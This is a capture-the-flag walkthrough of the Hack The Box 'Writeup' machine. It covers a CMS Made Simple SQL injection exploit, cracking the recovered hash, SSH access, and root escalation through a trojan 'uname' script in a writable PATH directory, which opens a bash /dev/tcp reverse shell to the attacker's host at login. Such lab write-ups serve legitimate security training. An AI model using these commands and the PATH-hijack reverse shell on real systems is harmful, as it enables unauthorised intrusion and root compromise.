Writeup
Contents
Ports scan
u505@kali:~/HTB/Machines/Writeup$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.138 --rate=1000 [sudo] password for u505:
Starting masscan 1.0.5 at 2020-02-25 13:03:47 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on 10.10.10.138 Discovered open port 22/tcp on 10.10.10.138
u505@kali:~/HTB/Machines/Writeup$ nmap -sC -sV 10.10.10.138 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 08:01 EST Nmap scan report for writeup.htb (10.10.10.138) Host is up (0.038s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA) | 256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA) |_ 256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) | http-robots.txt: 1 disallowed entry |_/writeup/ |_http-title: Nothing here yet. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.29 seconds
Web
The web is a geek style site, but there is a warning, that a DoS script ban ip's that returns too many 40x errors. We cannot run a web enumeration.
u505@kali:~/HTB/Machines/Writeup$ curl http://writeup.htb <html lang="en_US"> <head><title>Nothing here yet.</title><style>.footer { background-color: #A0A0FF; position: fixed; left: 0; bottom: 0; width: 100%; color: black; text-align: center; }</style></head> <body bgcolor="#4040E0"> <center><pre> <font color="#FF6666"> ######################################################################## # # # *** NEWS *** NEWS *** NEWS *** NEWS *** NEWS *** # # # # Not yet live and already under attack. I found an ,~~--~~-. # # Eeyore DoS protection script that is in place and + | |\ # # watches for Apache 40x errors and bans bad IPs. || |~ |`,/-\ # # Hope you do not get hit by false-positive drops! *\_) \_) `-' # # # # If you know where to download the proper Donkey DoS protection # # please let me know via mail to jkr@writeup.htb - thanks! # # # ######################################################################## </font> <b> <font color="#A0A0FF"> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 88888888888888888888888888888888888888888888888888888 8888"""""""""""""""8888888888888888888888888888888888 8888 8888888888888888888888888888888888 8888 HTB NOTES 8888888888888888888888888888888888 8888 888888888888888888888888888888888" 8888aaaaaaaaaaaaaaa888888888888888888888888888888888a 88888888888888888888888888888888888888888888888888888 88888888888888888888888888888888888888888888888888888 88888888888888888888888888888888888888888888888888888 88888888888888888888888":::::"88888888888888888888888 888888888888888888888::;gPPRg;::888888888888888888888 88888888888888888888::dP' `Yb::88888888888888888888 88888888888888888888::8) (8::88888888888888888888 88888888888888888888;:Yb dP:;88( )888888888888888 888888888888888888888;:"8ggg8":;888888888888888888888 88888888888888888888888aa:::aa88888888888888888888888 88888888888888888888888888888888888888888888888888888 88888888888888888888888888888888888888888888888888888 88888888888888888888888888"88888888888888888888888888 8888888888888888888888888:::8888888888888888888888888 8888888888888888888888888:::8888888888888888888888888 8888888888888888888888888:::8888888888888888888888888 8888888888888888888888888:::8888888888888888888888888 8888888888888888888888888:::8888888888888888888888888 88888888888888888888888888a88888888888888888888888888 """""""""""""""""""' `"""""""""' `""""""""""""""""""" (c) by Normand Veilleux <br> <br> I am still searching through my backups so there is nothing here yet. I am preparing go-live of my own www.hackthebox.eu write-up page soon. Stay tuned! <br> <br> <br> <br> <br> <br> </pre></center></b> <div class="footer"><p><pre>Page is hand-crafted with vi.</pre></p></div> </body> </html>
Robots.txt
The robots file give us a clue about URL to visit (Nmap found iit too).
u505@kali:~/HTB/Machines/Writeup$ curl http://writeup.htb/robots.txt # __ # _(\ |@@| # (__/\__ \--/ __ # \___|----| | __ # \ }{ /\ )_ / _\ # /\__/\ \__O (__ # (--/\--) \__/ # _)( )(_ # `------`
# Disallow access to the blog until content is finished. User-agent: * Disallow: /writeup/
/writeup/
The CMS is CMS Made Simple.
u505@kali:~/HTB/Machines/Writeup$ curl http://writeup.htb/writeup/ <!doctype html> <html lang="en_US"><head> <title>Home - writeup</title> <base href="http://writeup.htb/writeup/" /> <meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <!-- cms_stylesheet error: No stylesheets matched the criteria specified --> <style>.footer { background-color: white; position: fixed; left: 0; bottom: 0; width: 100%; color: black; text-align: center; }</style> </head><body> <header id="header"> <h1>writeup</h1> </header> <nav id="menu"> <ul><li class="currentpage"><a class="currentpage" href="http://writeup.htb/writeup/">Home Page</a></li><li><a href="http://writeup.htb/writeup/index.php?page=ypuffy">ypuffy</a></li><li><a href="http://writeup.htb/writeup/index.php?page=blue">blue</a></li><li><a href="http://writeup.htb/writeup/index.php?page=writeup">writeup</a></li></ul> </nav> <section id="content"> <h1>Home</h1> <p>After many month of lurking around on HTB I also decided to start writing about the boxes I hacked. In the upcoming days, weeks and month you will find more and more content here as I am about to convert my famous incomplete notes into pretty write-ups.</p> <p>I am still searching for someone to provide or make a cool theme. If you are interested, please contact me on <a href="https://mm.netsecfocus.com/">NetSec Focus Mattermost</a>. Thanks.</p> </section> <div class="footer"> <p>Pages are hand-crafted with vim. NOT.</p> </div> </body> </html>
The copyright is from 2019, and the machine was released on June 2019. So version can only be 2.2.9, 2.2.9.1 or 2.2.10. (http://dev.cmsmadesimple.org/project/files/6)
u505@kali:~/HTB/Machines/Writeup$ searchsploit CMS Made Simple
-------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------- ----------------------------------------
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code E | exploits/php/remote/46627.rb
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion | exploits/php/webapps/26217.html
CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting | exploits/php/webapps/26298.txt
CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting | exploits/php/webapps/29272.txt
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection | exploits/php/webapps/29941.txt
CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulne | exploits/php/webapps/32668.txt
CMS Made Simple 1.11.9 - Multiple Vulnerabilities | exploits/php/webapps/43889.txt
CMS Made Simple 1.2 - Remote Code Execution | exploits/php/webapps/4442.txt
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection | exploits/php/webapps/4810.txt
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upl | exploits/php/webapps/5600.php
CMS Made Simple 1.4.1 - Local File Inclusion | exploits/php/webapps/7285.txt
CMS Made Simple 1.6.2 - Local File Disclosure | exploits/php/webapps/9407.txt
CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scr | exploits/php/webapps/33643.txt
CMS Made Simple 1.6.6 - Multiple Vulnerabilities | exploits/php/webapps/11424.txt
CMS Made Simple 1.7 - Cross-Site Request Forgery | exploits/php/webapps/12009.html
CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion | exploits/php/webapps/34299.py
CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Reque | exploits/php/webapps/34068.html
CMS Made Simple 2.1.6 - Multiple Vulnerabilities | exploits/php/webapps/41997.txt
CMS Made Simple 2.1.6 - Remote Code Execution | exploits/php/webapps/44192.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | exploits/php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution | exploits/php/webapps/45793.py
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoni | exploits/php/webapps/39760.txt
CMS Made Simple < 2.2.10 - SQL Injection | exploits/php/webapps/46635.py
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upl | exploits/php/webapps/34300.py
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary Fil | exploits/php/webapps/34298.py
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbi | exploits/php/webapps/46546.py
-------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/Writeup$ searchsploit -m 46635
Exploit: CMS Made Simple < 2.2.10 - SQL Injection
URL: https://www.exploit-db.com/exploits/46635
Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Writeup/46635.py
This exploit is an time based SQL injection. It allows to find username, email, salt and password hashed.
u505@kali:~/HTB/Machines/Writeup$ python 46635.py -u http://10.10.10.138/writeup/ [+] Salt for password found: 5a599ef579066807 [+] Username found: jkr [+] Email found: jkr@writeup.htb [+] Password found: 62def4866937f08cc13bab43bb14e6f7
We create the hashfile for hashcat
u505@kali:~/HTB/Machines/Writeup$ cat hash.txt 62def4866937f08cc13bab43bb14e6f7:5a599ef579066807
And we bruteforce it with hashcat.
u505@kali:~/HTB/Machines/Writeup$ hashcat --force -m 20 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
u505@kali:~/HTB/Machines/Writeup$ hashcat --force -m 20 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9
User Flag
With the user and password, we can ssh into the server.
u505@kali:~/HTB/Machines/Writeup$ ssh jkr@writeup.htb The authenticity of host 'writeup.htb (10.10.10.138)' can't be established. ECDSA key fingerprint is SHA256:TEw8ogmentaVUz08dLoHLKmD7USL1uIqidsdoX77oy0. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'writeup.htb,10.10.10.138' (ECDSA) to the list of known hosts. jkr@writeup.htb's password: Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
The programs included with the Devuan GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. jkr@writeup:~$ cat user.txt <USER_FLAG>
Local enumeration
u505@kali:~/HTB/Machines/Writeup/www$ ls -ltr total 3056 -rw-r--r-- 1 u505 u505 46631 Feb 9 21:32 LinEnum.sh -rw-r--r-- 1 u505 u505 3078592 Feb 9 21:32 pspy64 u505@kali:~/HTB/Machines/Writeup/www$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ...
From the target server
jkr@writeup:~$ cd /tmp/ jkr@writeup:/tmp$ wget -q http://10.10.14.30/pspy64 jkr@writeup:/tmp$ wget -q http://10.10.14.30/LinEnum.sh jkr@writeup:/tmp$ chmod +x pspy64 LinEnum.sh
The LinEnum.sh doesn't give us any clue how to escalate privileges.
2020/02/25 09:27:01 CMD: UID=0 PID=2502 | /usr/sbin/CRON 2020/02/25 09:27:01 CMD: UID=0 PID=2503 | /usr/sbin/CRON 2020/02/25 09:27:01 CMD: UID=0 PID=2504 | /bin/sh -c /root/bin/cleanup.pl >/dev/null 2>&1
There is a job task, but we cannot access the file cleanup.pl
ssh login
When we start an ssh session the following command are executed
2020/02/25 09:27:27 CMD: UID=0 PID=2506 | sshd: [accepted] 2020/02/25 09:27:27 CMD: UID=0 PID=2507 | sshd: [accepted] 2020/02/25 09:27:35 CMD: UID=0 PID=2508 | sshd: jkr [priv] 2020/02/25 09:27:35 CMD: UID=0 PID=2509 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new 2020/02/25 09:27:35 CMD: UID=0 PID=2510 | run-parts --lsbsysinit /etc/update-motd.d 2020/02/25 09:27:35 CMD: UID=0 PID=2511 | uname -rnsom 2020/02/25 09:27:35 CMD: UID=0 PID=2512 | sshd: jkr [priv] 2020/02/25 09:27:35 CMD: UID=1000 PID=2513 | -bash 2020/02/25 09:27:35 CMD: UID=1000 PID=2514 | -bash 2020/02/25 09:27:35 CMD: UID=1000 PID=2515 | -bash 2020/02/25 09:27:36 CMD: UID=1000 PID=2516 | -bash 2020/02/25 09:27:36 CMD: UID=1000 PID=2517 | -bash
In the folder /etc/update-motd.d/ we found the file 10-uname
jkr@writeup:~$ ls -l /etc/update-motd.d/
total 4
-rwxr-xr-x 1 root root 23 Jun 3 2018 10-uname
jkr@writeup:~$ cat /etc/update-motd.d/10-uname
#!/bin/sh
uname -rnsom
jkr@writeup:~$ uname -rnsom
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
We cannot change the file 10-uname
jkr@writeup:~$ whereis uname uname: /bin/uname /usr/share/man/man1/uname.1.gz
The command uname is located in /bin/ Our user is on group staff
jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
These are the folder in the PATH environment detected by pspy
jkr@writeup:~$ ls -ld /usr/local/sbin/ drwx-wsr-x 2 root staff 12288 Apr 19 2019 /usr/local/sbin/ jkr@writeup:~$ ls -ld /usr/local/bin/ drwx-wsr-x 2 root staff 20480 Apr 19 2019 /usr/local/bin/ jkr@writeup:~$ ls -ld /usr/sbin/ drwxr-xr-x 2 root root 4096 Aug 23 2019 /usr/sbin/ jkr@writeup:~$ ls -ld /usr/bin/ drwxr-xr-x 2 root root 20480 Aug 23 2019 /usr/bin/ jkr@writeup:~$ ls -ld /sbin/ drwxr-xr-x 2 root root 4096 Aug 23 2019 /sbin/ jkr@writeup:~$ ls -ld /bin/ drwxr-xr-x 2 root root 4096 Apr 19 2019 /bin/
The strategy is to create a new uname command that opens a reverse shell as root
Escalation of Privileges
jkr@writeup:/tmp$ cat uname #!/bin/bash VAR=$* /bin/bash -i >& /dev/tcp/10.10.14.30/4444 0>&1 & /bin/uname $VAR
We raise the listener
u505@kali:~/HTB/Machines/Writeup$ nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
If we execute our new uname script, it returns the uname command, but at the same time opens a reverse shell.
jkr@writeup:/tmp$ ./uname -a Linux writeup 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux u505@kali:~/HTB/Machines/Writeup$ nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.138. Ncat: Connection from 10.10.10.138:40656.
Now, if we copy our "uname" version in /usr/local/bin/, our uname command should be executed before the real uname command
jkr@writeup:/tmp$ cp uname /usr/local/bin/
When we login from another console, our uname command will open a reverse shell as root
u505@kali:~/HTB/Machines/Writeup$ ssh jkr@writeup.htb jkr@writeup.htb's password: Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux ...
Our reverse shell is opened.
u505@kali:~/HTB/Machines/Writeup$ nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.138. Ncat: Connection from 10.10.10.138:40658. bash: cannot set terminal process group (3145): Inappropriate ioctl for device bash: no job control in this shell root@writeup:/# whoami whoami root
Root flag
root@writeup:/# cat /root/root.txt cat /root/root.txt <ROOT Flag>
References
Daniel Simao 08:00, 25 February 2020 (EST)
